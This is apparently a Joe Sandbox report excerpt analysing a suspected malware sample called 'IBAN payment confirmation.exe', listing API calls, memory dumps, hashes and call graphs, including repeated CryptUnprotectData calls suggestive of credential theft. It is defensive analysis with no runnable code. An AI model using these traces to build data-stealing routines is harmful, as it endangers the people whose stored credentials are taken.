                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                                                              • API String ID: 2659869361-2382934351
                                                                                                                              • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                                              • Instruction ID: 6247f5a3c9563be90945cd41d23768fa590745b080056b24a315d5606c671452
                                                                                                                              • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                                              • Instruction Fuzzy Hash: E5D05E21101921AAC21277448C04DDF669CEE45300384002AF200B20A2CB7C1D518BFD
                                                                                                                              APIs
                                                                                                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                                              • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                                              • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                                                • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1404258612-0
                                                                                                                              • Opcode ID: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                              • Instruction ID: 0d64a3d5d22a86ce83a9b45ae5cd800923300da454a86426803db7941f711343
                                                                                                                              • Opcode Fuzzy Hash: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                              • Instruction Fuzzy Hash: 76113675A00208AFDB00DFA5C945DAEBBB9EF04344F20407AF905F62A1D7349E50CB68
                                                                                                                              APIs
                                                                                                                              • FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,771B2EE0,004037F6,771B3420,00403621,?), ref: 00403839
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00403840
                                                                                                                              Strings
                                                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403831
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                                                              • API String ID: 1100898210-2382934351
                                                                                                                              • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                                                                              • Instruction ID: bf490ea997193b46d556285b385326fb3516ec302950e4cd11f154ac4515a356
                                                                                                                              • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                                                                              • Instruction Fuzzy Hash: F9E0C23394102057C7216F15ED04B1ABBE86F89B22F018476F9407B7A283746C528BED
                                                                                                                              APIs
                                                                                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IBAN payment confirmation.exe,C:\Users\user\Desktop\IBAN payment confirmation.exe,80000000,00000003), ref: 00405987
                                                                                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IBAN payment confirmation.exe,C:\Users\user\Desktop\IBAN payment confirmation.exe,80000000,00000003), ref: 00405997
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CharPrevlstrlen
                                                                                                                              • String ID: C:\Users\user\Desktop
                                                                                                                              • API String ID: 2709904686-3976562730
                                                                                                                              • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                                              • Instruction ID: e5431d3d33a146c3150d202dfaa2e9e12a1dec100281116c20088c3141bfb115
                                                                                                                              • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                                              • Instruction Fuzzy Hash: C6D05EA2414920DED3226704DC44AAFA3ACEF113107894466F901E61A5D7785C808AFD
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                                                • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1955740112.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1955670729.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1955830889.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1955921061.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$Free$Alloclstrcpy
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 852173138-0
                                                                                                                              • Opcode ID: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                                                              • Instruction ID: c8ae98bcc35e74d2b72c58860f7bdf59a74f39180ec1ffd54fa0f92d9f30571b
                                                                                                                              • Opcode Fuzzy Hash: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                                                              • Instruction Fuzzy Hash: 5E3190F6904211AFF314CF64DC859EA77E8EB853D0B124529FB41E726CEB34E8018765
                                                                                                                              APIs
                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                                              • lstrcmpiA.KERNEL32(00405CF5,00000000), ref: 00405AE3
                                                                                                                              • CharNextA.USER32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF4
                                                                                                                              • lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 190613189-0
                                                                                                                              • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                              • Instruction ID: dad0a046b028959ebe33103b56e1cab2fddac0818810981e259aca52f0e6fc56
                                                                                                                              • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                              • Instruction Fuzzy Hash: 59F06232608558BFC712DFA5DD40D9FBBA8DF06260B2540B6F801F7251D674FE019BA9

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:12.3%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:3%
                                                                                                                              Total number of Nodes:232
                                                                                                                              Total number of Limit Nodes:18
                                                                                                                              execution_graph 44395 3a201cb0 SetTimer 44396 3a201d1c 44395->44396 44397 3a201d50 44400 3a201d7d 44397->44400 44398 3a201dcc 44398->44398 44400->44398 44401 3a20093c 44400->44401 44402 3a200947 44401->44402 44403 3a201f2c 44402->44403 44405 3a200904 44402->44405 44403->44398 44406 3a20090f 44405->44406 44409 3a20095c 44406->44409 44408 3a201f85 44408->44403 44410 3a200967 44409->44410 44411 3a2020f1 GetCurrentThreadId 44410->44411 44412 3a20211b 44410->44412 44411->44412 44412->44408 44413 11b158 44414 11b174 44413->44414 44420 11e470 44414->44420 44415 11b1a3 44425 3a2023c0 44415->44425 44431 3a2023b0 44415->44431 44421 11e48c 44420->44421 44437 3983a919 44421->44437 44441 3983a928 44421->44441 44422 11e4c2 44422->44415 44426 3a2023cf 44425->44426 44474 3a200558 44426->44474 44432 3a2023c0 44431->44432 44433 3a200558 10 API calls 44432->44433 44434 3a2023d6 44433->44434 44435 3a200a1c 14 API calls 44434->44435 44436 11b1b1 44435->44436 44439 3983a94a 44437->44439 44438 3983add9 44438->44422 44439->44438 44445 3983b1e1 44439->44445 44443 3983a94a 44441->44443 44442 3983add9 44442->44422 44443->44442 44444 3983b1e1 CryptUnprotectData 44443->44444 44444->44443 44446 3983b1f0 44445->44446 44450 3983b820 44446->44450 44458 3983b830 44446->44458 44447 3983b260 44447->44439 44451 3983b855 44450->44451 44453 3983b909 44450->44453 44451->44453 44455 3983b820 CryptUnprotectData 44451->44455 44456 3983b830 CryptUnprotectData 44451->44456 44466 3983ba10 44451->44466 44470 3983b4c0 44453->44470 44455->44453 44456->44453 44459 3983b855 44458->44459 44460 3983b909 44458->44460 44459->44460 44463 3983b820 CryptUnprotectData 44459->44463 44464 3983b830 CryptUnprotectData 44459->44464 44465 3983ba10 CryptUnprotectData 44459->44465 44461 3983b4c0 CryptUnprotectData 44460->44461 44462 3983bad5 44461->44462 44462->44447 44463->44460 44464->44460 44465->44460 44467 3983ba25 44466->44467 44468 3983b4c0 CryptUnprotectData 44467->44468 44469 3983bad5 44468->44469 44469->44453 44471 3983bcc0 CryptUnprotectData 44470->44471 44473 3983bad5 44471->44473 44473->44447 44475 3a200568 44474->44475 44476 3a200585 44475->44476 44483 3a200608 44475->44483 44495 3a2005f8 44475->44495 44479 3a200a1c 44476->44479 44480 3a200a27 44479->44480 44517 3a200ac4 44480->44517 44482 3a2024c6 44482->44482 44484 3a20064e GetCurrentProcess 44483->44484 44486 3a2006a0 GetCurrentThread 44484->44486 44487 3a200699 44484->44487 44488 3a2006d6 44486->44488 44489 3a2006dd GetCurrentProcess 44486->44489 44487->44486 44488->44489 44490 3a200713 44489->44490 44507 3a200fc1 44490->44507 44509 3a200be1 44490->44509 44491 3a20073b GetCurrentThreadId 44492 3a20076c 44491->44492 44492->44476 44496 3a20064e GetCurrentProcess 44495->44496 44498 3a2006a0 GetCurrentThread 44496->44498 44499 3a200699 44496->44499 44500 3a2006d6 44498->44500 44501 3a2006dd GetCurrentProcess 44498->44501 44499->44498 44500->44501 44502 3a200713 44501->44502 44505 3a200fc1 44502->44505 44506 3a200be1 2 API calls 44502->44506 44503 3a20073b GetCurrentThreadId 44504 3a20076c 44503->44504 44504->44476 44505->44503 44506->44503 44508 3a200fde 44507->44508 44508->44491 44513 3a200c58 DuplicateHandle 44509->44513 44515 3a200c50 DuplicateHandle 44509->44515 44510 3a200c1e 44510->44491 44514 3a200cee 44513->44514 44514->44510 44516 3a200cee 44515->44516 44516->44510 44522 3a200acf 44517->44522 44518 3a202fe9 44519 3a203019 44518->44519 44520 3a2029e0 11 API calls 44518->44520 44524 3a203044 44519->44524 44539 3a2029e0 44519->44539 44520->44519 44522->44518 44522->44524 44529 3a203f98 44522->44529 44534 3a203fa8 44522->44534 44523 3a203031 44545 3a20d547 44523->44545 44552 3a20d558 44523->44552 44524->44482 44531 3a203fc9 44529->44531 44530 3a203fed 44530->44518 44531->44530 44559 3a204147 44531->44559 44565 3a204158 44531->44565 44535 3a203fc9 44534->44535 44536 3a203fed 44535->44536 44537 3a204147 10 API calls 44535->44537 44538 3a204158 10 API calls 44535->44538 44536->44518 44537->44536 44538->44536 44541 3a2029eb 44539->44541 44540 3a20cff1 44540->44523 44541->44540 44542 3a200558 10 API calls 44541->44542 44543 3a20d00b 44542->44543 44583 3a20c474 44543->44583 44551 3a20d5bd 44545->44551 44546 3a20d7e9 44547 3a200558 10 API calls 44546->44547 44549 3a20d60a 44547->44549 44548 3a20da20 WaitMessage 44548->44551 44549->44524 44551->44546 44551->44548 44551->44549 44590 3a20c53c 44551->44590 44558 3a20d5bd 44552->44558 44553 3a20d7e9 44554 3a200558 10 API calls 44553->44554 44556 3a20d60a 44554->44556 44555 3a20da20 WaitMessage 44555->44558 44556->44524 44557 3a20c53c DispatchMessageW 44557->44558 44558->44553 44558->44555 44558->44556 44558->44557 44560 3a204155 44559->44560 44561 3a200558 10 API calls 44560->44561 44562 3a204193 44561->44562 44563 3a20419e 44562->44563 44571 3a202b1c 44562->44571 44563->44530 44566 3a204165 44565->44566 44567 3a200558 10 API calls 44566->44567 44568 3a204193 44567->44568 44569 3a20419e 44568->44569 44570 3a202b1c 10 API calls 44568->44570 44569->44530 44570->44569 44572 3a202b27 44571->44572 44574 3a204210 44572->44574 44575 3a202b50 44572->44575 44574->44574 44576 3a202b5b 44575->44576 44579 3a202b60 44576->44579 44578 3a20427f 44578->44574 44580 3a202b6b 44579->44580 44581 3a205680 44580->44581 44582 3a203fa8 10 API calls 44580->44582 44581->44578 44582->44581 44584 3a20c47f 44583->44584 44585 3a20d30b 44584->44585 44587 3a20c490 44584->44587 44585->44540 44588 3a20d340 OleInitialize 44587->44588 44589 3a20d3a4 44588->44589 44589->44585 44591 3a20e650 DispatchMessageW 44590->44591 44592 3a20e6bc 44591->44592 44592->44551 44593 11fd98 44594 11fe00 CreateWindowExW 44593->44594 44596 11febc 44594->44596 44597 ad030 44598 ad048 44597->44598 44599 ad0a2 44598->44599 44604 11ff41 44598->44604 44609 11ff50 44598->44609 44614 3a201860 44598->44614 44625 3a201830 44598->44625 44605 11ff76 44604->44605 44607 3a201830 2 API calls 44605->44607 44608 3a201860 2 API calls 44605->44608 44606 11ff97 44606->44599 44607->44606 44608->44606 44610 11ff76 44609->44610 44612 3a201830 2 API calls 44610->44612 44613 3a201860 2 API calls 44610->44613 44611 11ff97 44611->44599 44612->44611 44613->44611 44617 3a20188d 44614->44617 44615 3a2018c1 44618 3a2018bf 44615->44618 44670 3a2008e4 44615->44670 44617->44615 44619 3a2018b1 44617->44619 44619->44618 44636 3a2019d8 44619->44636 44645 3a2019e8 44619->44645 44654 3a209918 44619->44654 44659 3a209928 44619->44659 44664 3a2098e2 44619->44664 44628 3a20188d 44625->44628 44626 3a2018c1 44627 3a2008e4 CallWindowProcW 44626->44627 44630 3a2018bf 44626->44630 44627->44630 44628->44626 44629 3a2018b1 44628->44629 44629->44630 44631 3a2098e2 CallWindowProcW 44629->44631 44632 3a209928 CallWindowProcW 44629->44632 44633 3a209918 CallWindowProcW 44629->44633 44634 3a2019e8 2 API calls 44629->44634 44635 3a2019d8 2 API calls 44629->44635 44631->44630 44632->44630 44633->44630 44634->44630 44635->44630 44637 3a201a23 44636->44637 44638 3a2019f6 44636->44638 44637->44638 44640 3a201a28 44637->44640 44639 3a2019fe 44638->44639 44641 3a2008e4 CallWindowProcW 44638->44641 44639->44618 44642 3a200904 GetCurrentThreadId 44640->44642 44644 3a201a3c 44641->44644 44643 3a201a34 44642->44643 44643->44618 44644->44618 44646 3a201a23 44645->44646 44647 3a2019f6 44645->44647 44646->44647 44648 3a201a28 44646->44648 44649 3a2008e4 CallWindowProcW 44647->44649 44653 3a2019fe 44647->44653 44650 3a200904 GetCurrentThreadId 44648->44650 44652 3a201a3c 44649->44652 44651 3a201a34 44650->44651 44651->44618 44652->44618 44653->44618 44656 3a209926 44654->44656 44655 3a2099c8 44655->44618 44674 3a2099e0 44656->44674 44677 3a2099d0 44656->44677 44661 3a20993c 44659->44661 44660 3a2099c8 44660->44618 44662 3a2099e0 CallWindowProcW 44661->44662 44663 3a2099d0 CallWindowProcW 44661->44663 44662->44660 44663->44660 44665 3a2098f0 44664->44665 44667 3a209926 44664->44667 44665->44618 44666 3a2099c8 44666->44618 44668 3a2099e0 CallWindowProcW 44667->44668 44669 3a2099d0 CallWindowProcW 44667->44669 44668->44666 44669->44666 44671 3a2008ef 44670->44671 44672 3a201aea CallWindowProcW 44671->44672 44673 3a201a99 44671->44673 44672->44673 44673->44618 44675 3a2099f1 44674->44675 44680 3a20ae21 44674->44680 44675->44655 44678 3a2099f1 44677->44678 44679 3a20ae21 CallWindowProcW 44677->44679 44678->44655 44679->44678 44681 3a2008e4 CallWindowProcW 44680->44681 44682 3a20ae3a 44681->44682 44682->44675

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1712 3a20e710-3a20e73b 1713 3a20e742-3a20e7a2 1712->1713 1714 3a20e73d 1712->1714 1716 3a20ead5-3a20eafd 1713->1716 1717 3a20e7a8-3a20e8b9 1713->1717 1714->1713 1720 3a20eb03-3a20eb30 1716->1720 1721 3a20f288-3a20f2b0 1716->1721 1759 3a20e8e3 1717->1759 1760 3a20e8bb-3a20e8c7 1717->1760 1727 3a20eb36-3a20ed3a 1720->1727 1728 3a20ee2e-3a20f199 1720->1728 1725 3a20f2b6-3a20f472 1721->1725 1726 3a20f549 1721->1726 1826 3a20f481-3a20f493 call 113168 1725->1826 1730 3a20f54a-3a20f551 1726->1730 1828 3a20ed53-3a20ed64 1727->1828 1829 3a20ed3c-3a20ed51 1727->1829 1873 3a20f1b2-3a20f1c3 1728->1873 1874 3a20f19b-3a20f1b0 1728->1874 1764 3a20e8e9-3a20ea8b 1759->1764 1765 3a20e8d1-3a20e8d7 1760->1765 1766 3a20e8c9-3a20e8cf 1760->1766 1841 3a20ea9a-3a20ea9b 1764->1841 1842 3a20ea8d-3a20ea99 1764->1842 1767 3a20e8e1 1765->1767 1766->1767 1767->1764 1830 3a20f498-3a20f4eb 1826->1830 1837 3a20ed65-3a20ee29 1828->1837 1829->1837 1850 3a20f4f6-3a20f517 call 39c9a709 1830->1850 1865 3a20f287 1837->1865 1841->1716 1842->1841 1854 3a20f51c-3a20f51e 1850->1854 1854->1730 1865->1721 1877 3a20f1c4-3a20f286 1873->1877 1874->1877 1877->1865
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2531235973.000000003A200000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A200000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_3a200000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Teq$p;t
                                                                                                                              • API String ID: 0-491657406
                                                                                                                              • Opcode ID: b323c963cf222a3c4b807b5b33e7116a56daa8d6d0c428fef898cfd029b0aebb
                                                                                                                              • Instruction ID: 7dee1087f4e58b4a1b605f6eef48a43a6000d1e076f89930f530ac7dab1b5a83
                                                                                                                              • Opcode Fuzzy Hash: b323c963cf222a3c4b807b5b33e7116a56daa8d6d0c428fef898cfd029b0aebb
                                                                                                                              • Instruction Fuzzy Hash: DF82B374A41218CFEB65DF64C955B99BBB2FF89301F1081EAD80967364CB35AE82DF40

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1889 39c998d0-39c998f0 1890 39c998f2 1889->1890 1891 39c998f7-39c99957 1889->1891 1890->1891 1893 39c99c8a-39c99cb2 1891->1893 1894 39c9995d-39c99a6e 1891->1894 1897 39c9a439-39c9a461 1893->1897 1898 39c99cb8-39c99cdf 1893->1898 1936 39c99a98 1894->1936 1937 39c99a70-39c99a7c 1894->1937 1902 39c9a6f0 1897->1902 1903 39c9a467-39c9a6bd call 113168 call 39c9a709 1897->1903 1905 39c99fde-39c9a34a 1898->1905 1906 39c99ce5-39c99eea 1898->1906 1907 39c9a6f1-39c9a6f7 1902->1907 2031 39c9a6c3-39c9a6c5 1903->2031 2050 39c9a34c-39c9a361 1905->2050 2051 39c9a363-39c9a374 1905->2051 2005 39c99eec-39c99f01 1906->2005 2006 39c99f03-39c99f14 1906->2006 1938 39c99a9e-39c99c40 1936->1938 1941 39c99a7e-39c99a84 1937->1941 1942 39c99a86-39c99a8c 1937->1942 2017 39c99c4f-39c99c50 1938->2017 2018 39c99c42-39c99c4e 1938->2018 1944 39c99a96 1941->1944 1942->1944 1944->1938 2013 39c99f15-39c99fd9 2005->2013 2006->2013 2042 39c9a438 2013->2042 2017->1893 2018->2017 2031->1902 2031->1907 2042->1897 2054 39c9a375-39c9a437 2050->2054 2051->2054 2054->2042
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Teq$p;t
                                                                                                                              • API String ID: 0-491657406
                                                                                                                              • Opcode ID: d0c81040d6a06daca272f21e338cdf2c04b4d88d1e7be8564ed58f3e4a30d670
                                                                                                                              • Instruction ID: 8a6cda8d7a8c02f20f7ab09000b018c15d1bd56888643412f81a91a49d25283b
                                                                                                                              • Opcode Fuzzy Hash: d0c81040d6a06daca272f21e338cdf2c04b4d88d1e7be8564ed58f3e4a30d670
                                                                                                                              • Instruction Fuzzy Hash: 7072C374A41218CFEB64DF64C955BD9BBB2FF89301F1081A9D809673A4CB35AE82DF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2531235973.000000003A200000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A200000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_3a200000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DispatchMessage
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2061451462-0
                                                                                                                              • Opcode ID: 6899546bf2962be2c08f72394909b413dbf8c6b8cf919d1e01dcd61d49243a98
                                                                                                                              • Instruction ID: d5d175379817d00f22b081c716d10ea96ace1ad6dd0fd48309e5ee8a03106683
                                                                                                                              • Opcode Fuzzy Hash: 6899546bf2962be2c08f72394909b413dbf8c6b8cf919d1e01dcd61d49243a98
                                                                                                                              • Instruction Fuzzy Hash: 98F17C74A01309CFEB18DFA9C944B9DBBF2BF48304F158659E409AB365DB74A946CF80
                                                                                                                              APIs
                                                                                                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 3983BD25
